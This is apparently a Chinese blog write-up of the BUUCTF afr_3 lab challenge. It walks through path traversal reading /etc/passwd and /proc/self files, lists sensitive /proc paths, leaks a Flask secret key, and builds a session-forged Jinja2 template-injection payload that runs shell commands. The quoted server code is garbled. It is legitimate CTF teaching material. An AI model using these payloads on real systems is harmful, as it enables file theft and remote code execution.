《从0到1:CTFer成长之路》书籍配套题目--afr_3 BUUCTF

最新推荐文章于 2024-04-14 21:48:55 发布
最新推荐文章于 2024-04-14 21:48:55 发布
阅读量2.7k 收藏 11
点赞数 7
分类专栏: ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wuyaowangchuan/article/details/109784072
版权

在这里插入图片描述
还是任意文件读取漏洞
进入坏境
在这里插入图片描述
在这里插入图片描述
点入链接
在这里插入图片描述
这边可以读取文件
试一试article?name=../../../etc/passwd
在这里插入图片描述

在这里插入图片描述

读不到flag

/proc详解
linux进程与它的文件描述符、/proc/self 表示当前进程目录、lsof

Linux内核源代码情景分析-特殊文件系统/proc-对/proc/self/cwd的访问

/proc/sched_debug # 提供cpu上正在运行的进程信息,可以获得进程的pid号,可以配合后面需要pid的利用
/proc/mounts # 挂载的文件系统列表
/proc/net/arp # arp表,可以获得内网其他机器的地址
/proc/net/route # 路由表信息
/proc/net/tcp and /proc/net/udp # 活动连接的信息
/proc/net/fib_trie # 路由缓存
/proc/version  # 内核版本
/proc/[PID]/cmdline # 可能包含有用的路径信息
/proc/[PID]/environ #  程序运行的环境变量信息,可以用来包含getshell
/proc/[PID]/cwd     # 当前进程的工作目录
/proc/[PID]/fd/[#] # 访问file descriptors,某写情况可以读取到进程正在使用的文件,比如access.log

使用这个

payload:article?name=../../../proc/self/cmdline

在这里插入图片描述

PS:self当前运行进程ID的符号链接

在这里插入图片描述

回显python server.py

要想办法读取这个文件
因为不知道当前的路径,无法通过路径读取
所以通过当前进程的工作目录来读取

在这里插入图片描述
使用这个

payload:article?name=../../../proc/self/cwd/server.py

在这里插入图片描述
读到这个文件了耶
在这里插入图片描述
代码如下

#!/usr/bin/python
import os
from flask import (Flask, render_template, request, url_for, redirect, session, render_template_string)
from flask_session import Session

app = Flask(__name__)
execfile('flag.py')#execfile() 函数可以用来执行一个文件。
execfile('key.py')
FLAG = flag
app.secret_key = key @ app.route("/n1page", methods=["GET", "POST"])


def n1page():
    if request.method != "POST":
        return redirect(url_for("index"))
    n1code = request.form.get("n1code") or None
    if n1code is not None: n1code = n1code.replace(".", "").replace("_", "").replace("{", "").replace("}", "")
if "n1code" not in session or session['n1code'] is None: session['n1code'] = n1code
template = None
if session[
    'n1code'] is not None: template = '''<h1>N1 Page</h1> <div class="row> <div class="col-md-6 col-md-offset-3 center"> Hello : %s, why you don't look at our <a href='/article?name=article'>article</a>? </div> </div> ''' %
session['n1code']
session['n1code'] = None
return render_template_string(template) @ app.route("/", methods=["GET"])


def index(): return render_template("main.html") @ app.route('/article', methods=['GET'])


def article(): error = 0


if 'name' in request.args:
    page = request.args.get('name') else:
    page = 'article'
if page.find('flag') >= 0: page = 'notallowed.txt'
try:
    template = open('/home/nu11111111l/articles/{}'.format(page)).read() except Exception as e:
    template = e
return render_template('article.html', template=template)
if __name__ == "__main__": app.run(host='0.0.0.0', debug=False)

因为python不熟,这里就都是看别人的分析了

flag在flag.py(flag被过滤)
flask的appkey在key.py
源码里面存在ssti,前提是可以伪造flask的session

flask之ssti模版注入从零到入门
render()函数进行服务器端渲染(详细)

访问flag.py
在这里插入图片描述

访问key.py
在这里插入图片描述

接下来开始伪造session

密钥是Drmhze6EPcv0fN_81Bj-nA
构造

{'n1code': '{{\'\'.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__[\'os\'].popen(\'cat flag.py\').read()}}'}

加密。加密的脚本这样获取:

git clone https://github.com/noraj/flask-session-cookie-manager

在这里插入图片描述
.eJwdikEKgCAQAL8SXlYvQl2CviKxbGoRmCtZhxD_nnUbZqaI2Ft2XkyiFACNaAPljNjoOBnRDHPDfC-_961IZcb-k3vcr3_cAi8UWjLAGWadOPkowdLVrYE2nR5Q-vTkpKpV1BcrHygP.X7VhLg.TjoSPMRjbzbRBNeGnJ2EtXbpNCM

添加cookie上传
在这里插入图片描述

wuyaoooo
关注
  • 7
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[CTF从0到1学习] BUUCTF WEB部分 wp(待完善)
qq_43710889的博客
11-27 3962
[CTF从0到1学习] BUUCTF WEB部分 wp(待完善) 文章目录[CTF从0到1学习] BUUCTF WEB部分 wp(待完善)[HCTF 2018]WarmUp[极客大挑战 2019]EasySQL[极客大挑战 2019]Havefun[ACTF2020 新生赛]Include[强网杯 2019]随便注 [HCTF 2018]WarmUp 首先看看网页源码呗 <?php highlight_file(__FILE__); class emmm {
afr-example-weather-station:该示例演示了使用Amazon FreeRTOS的IoT库实现气象站的实现
03-18
该站点将使用MQTT协议连接到AWS IoT,并将天气更新发布到Thing Shadow。此外,气象站还订阅了其他气象站的更新。 要求 v2.1 程式语言:C 相关部件:所有具有FreeRTOS支持的部件 如果使用的是CMake,请安装以下附加...
《从0到1:CTFer成长之路afr_3
ZhShy
01-16 1061
文章目录靶场:afr_3知识点解题过程flag:n1book{afr_3_solved} 靶场:afr_3 知识点 /proc目录 flask之ssti模板注入 flask-session-cookie-manager burpsuite抓包 解题过程 检查首页,在输入框随便输入,并根据引导进入下一个页面 查看URL: http://9ba2d619-5c5e-4585-ab9e-9dc74f397e14.node4.buuoj.cn:81/article?name=article 通过
【CTFHUB】afr-1&afr-2&sql注入
最新发布
2301_80115024的博客
04-14 336
打开实例后,发现传参为/?p=hello试着更改传参,获得回显, /?p=flag无回显没其他思路了,看看题目上有提示,需要通过文件读取漏洞求解得到一长串base64码,解码得到flag:n1book{afr_1_solved}
《从0到1:CTFer成长之路
WEB渗透测试 从入门到萌新
04-12 1452
一、判断注入类型 二、猜解列名数量(字段数) ?id=1' order by 1%23 发现4,页面不正常,所以字段数为1,2,3 三、查看报错位(报错位:2和3) ?id=123' union select 1,2,3 %23 四、信息收集 1、数据库名称:database() 得到数据库名称:note 2、表的信息 ?id=123' union select 1,database(),group_concat(table_name) from information.
从0到1:CTFer成长之路-Nu1L战队-国内名牌战队的书籍 !!!最全最火的书籍!!!
01-28 898
从0到1:CTFer成长之路-Nu1L战队-国内名牌战队的书籍有需要的联系QQ:406991006
《从0到1:CTFer成长之路》2.1 SSRF漏洞
ZhShy
01-15 4915
文章目录2.1.1 SSRF的原理解析2.1.2 SSRF漏洞的寻找和测试2.1.3 SSRF漏洞攻击方式2.1.3.1 内部服务资产探测2.1.3.2 使用Gopher协议扩展攻击面1. 攻击Redis2. 攻击MySQL3. PHP-FPM攻击4. 攻击内网中的脆弱web应用 SSRF(Server Side Request Forgery,服务端请求伪造)是一种攻击者通过构造数据进而伪造服务器端发起请求的漏洞。因为请求是由内部发起的,所以一般情况下,SSRF漏洞攻击的目标往往是从外网无法访问的内部系
ALM-Board-Manual-V1.9.zip_Air-fuel ratio_The Chip_cj125_oxygen s
07-14
ALM (Accurate Lambda Meter) is an air- fuel -ratio (AFR) meter which uses the Bosch LSU4.9 wideband oxygen sensor and Bosch semiconductor chip CJ125 to accurately measure the AFR or lambda for ...
AFR.zip_RP Java_afr 48a_cad java_java cad_them
09-19
A system that takes CAD drawings as input and apply automatic feature recognition methods on them to identify different features present in them. The feature will then populate in a tree in the system...
士研电机液面控制器AFR-1说明书.pdf
09-11
士研电机液面控制器AFR-1说明书pdf,士研电机液面控制器AFR-1说明书:适用于控制任何导电液体之液面,用于交流电,具有突波保护装置,可有效的防止突波干扰,电极头使用低交流电压,可增加寿命,有两只指示灯,指示供水...
大数据-算法-SI发动机AFR非线性模型预测控制理论与方法研究.pdf
04-15
标题涉及的研究领域是大数据、算法和人工智能,具体聚焦于SI(Spark Ignition)发动机的AFR(Air-fuel Ratio)非线性模型预测控制。该领域的研究目标是提高汽车发动机的燃油效率和动力性能,同时满足严格的尾气排放...
《从0到1:CTFer成长之路配套题目Web WP
热门推荐
feng的博客
10-05 1万+
前言 自己刚学了CTF两个月,深感入门CTF的困难。非常感谢Nu1L战队可以编写这本一本非常详实而且全面的CTF书籍,为许许多多像我这样的弱鸡提供了入门的帮助。 自己是Web方向,虽然学了两个月,但是并不是很系统的对Web进行学习。非要给个定位的话,自己现在顶多算是0.2,距离这本书的从0到1还有很大的差距。因此为了提高自己,真正的成为1,自己买了这本书而且要努力的进行学习。 这本书的配套题目可以说给了自己学习知识的同时进行实践的机会。本来不想写WP的,因为考虑到Nu1L的微信公众号已经给出了WP。不过自己
CTF刷题记录Buuctf_N1BOOK——afr_3
m_de_g的博客
06-17 1728
** N1BOOK——afr_3 ** 一、解题思路 1.打开题目发现一个输入框 既然是web题的话,还是先查看页面源代码 就发现使用的是POST的提交方式,没办法,只能看这个框的秘密所在了 2.直接输入1进行查询 页面提示说,你为什么不看我们的文章呢?这里是个出发的按钮,点击 3.又有提示说明,这是一篇示例文章?内心充满了困惑?????? 抬头一看,URL好奇怪 http://80a3f61d-704d-4c38-b615-158bab104673.node3.buuoj.cn/article?
i春秋《从0到1:CTFer成长之路题目(Web——afr_1-3)
LSYZWF的博客
05-22 1196
文章目录题目题目链接解题思路总结题目题目链接解题思路总结题目题目题目链接 https://www.ichunqiu.com/battalion?t=1&r=68487 解题思路 1、发现参数p,尝试更改参数p的值 2、发现输入其他字符没有用,也不是SQL注入,尝试输入关键字flag 3、发现可能是文件包含漏洞,由于之前输入的是hello,没有文件后缀,所以可能是进行了后缀拼接 ,尝试给赋值hello.php 发现确实将后缀截断,并且拼接了指定后缀 4、尝试伪协议 http://ec
《从0到1:CTFer成长之路书籍配套题目(不定时更)
BvxiE的博客
07-01 566
放出提示: 使用dirbuster工具进行网页目录扫描,⼯具是kali⾃带, 用URL Fuzz,可以指定目录,指定扫描admin目录下面的所有文件,dir代表字典的每一行 或者 额,,,没扫出来,尝试自己直接做 得到提示,访问可得: 得到提示,访问可得:flag2:s_v3ry_im 会得到一个文件 这题看了wp,软件还是没整明白,过几天再试试。 Git测试,使用GitHack脚本对其进行测试,教程!kali有自带的Git、Python2和Python3。转战虚拟机…主要我下半天GitHac
《从0到1:CTFer成长之路》解题
m0_46495271的博客
07-14 425
举足轻重的信息搜集 第一题:常见的搜集 进入环境,用dirsearch扫一下,发现存在vim备份文件,gedit备份文件和robots.txt文件。 robots.txt直接访问,发现flag1_is_her3_fun.txt,直接访问发现了flag1。 index.php~直接访问,发现flag2。 直接访问.index.php.swp,把vim备份文件下载下来,然后vim -r index.php.swp对文件进行恢复,就可以得到flag3。 然后把这三个flag拼接起来就可以了。 第二题 粗心的小李
《从0到1:CTFer成长之路书籍配套题目第一章
Youth____的博客
12-11 1078
目录常见的搜集粗心的小李SQL注入-1SQL注入-2afr_1afr_2 常见的搜集 题目说了敏感文件,那就扫描一下目录 我用的dirsearch扫的 有四个是可以访问的目录,一个个访问看看 先访问了.index.php.swp 下载,查看 发现一个flag 再index.php~中发现另一个flag 在robots中发现第三个flag 粗心的小李 git文件泄露 用githack下载先 在GitHack中新增的目录中打开 获得flag SQL注入-1 直接用sqlmap跑 测试是
ctf之WEB练习二
渗透测试研究中心
12-15 8501
题目名称:从0到1CTFer成长之路-Web文件上传题目wirteup:启动题目场景,获得题目靶场,访问网站,发现是一个文件上传漏洞,并且源代码也显示出来。http://eci-2zead4wngyl8hacgmm4n.cloudeci1.ichunqiu.com/ 源代码大概如下分析:<?phpheader("Content-Type:text/html; charset=utf-8")...
i春秋《从0到1:CTFer成长之路》通关WP
07-08 4363
1、常见的搜集 题目内容:一共3部分flag 使用目录扫描工具,如:7kb-webpathbrute对该URL进行扫描: 打开第一个URL: 发现flag文件flag1_is_her3_fun.txt文件,访问即可得到flag1:n1book{info_1 打开第二个URL: 可以得到flag2:s_v3ry_im 打开第3个URL,下载index.php.swp,打开可以得到第3个flag3:p0rtant_hack}: 组合即可得到完整flag:n1book{info_1
AFR_FSDK_FACEMODEL
11-10
AFR_FSDK_FACEMODEL是虹软人脸...通过将人脸图像输入到虹软人脸识别SDK中,可以得到一个AFR_FSDK_FACEMODEL结构体,该结构体中存储了该人脸的特征数据。在进行人脸比对时,只需要将两个人脸的特征数据进行比对即可。\n\

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值